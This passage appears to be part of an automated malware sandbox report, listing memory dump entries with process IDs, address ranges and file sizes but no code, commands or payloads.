                                                                                                            • memory/5300-368-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5312-322-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5324-279-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5360-252-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5364-324-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5392-254-0x00000001401FBC30-mapping.dmp
                                                                                                            • memory/5392-256-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5392-253-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5440-312-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5456-351-0x0000000000402F68-mapping.dmp
                                                                                                            • memory/5460-357-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5500-278-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5540-255-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5612-367-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5644-260-0x000002080FB90000-0x000002080FBA4000-memory.dmp
                                                                                                              Filesize

                                                                                                              80KB

                                                                                                            • memory/5644-258-0x00000001402CA898-mapping.dmp
                                                                                                            • memory/5644-264-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5644-257-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5708-259-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5720-340-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5780-325-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5784-261-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5784-265-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/5784-266-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.3MB

                                                                                                            • memory/5836-344-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5848-283-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5888-277-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/5888-268-0x0000000000401480-mapping.dmp
                                                                                                            • memory/5888-267-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/5912-360-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5928-361-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6004-358-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6024-286-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6024-290-0x0000000004A74000-0x0000000004B75000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/6024-294-0x0000000004BF0000-0x0000000004C4C000-memory.dmp
                                                                                                              Filesize

                                                                                                              368KB

                                                                                                            • memory/6040-270-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6136-273-0x0000000000000000-mapping.dmp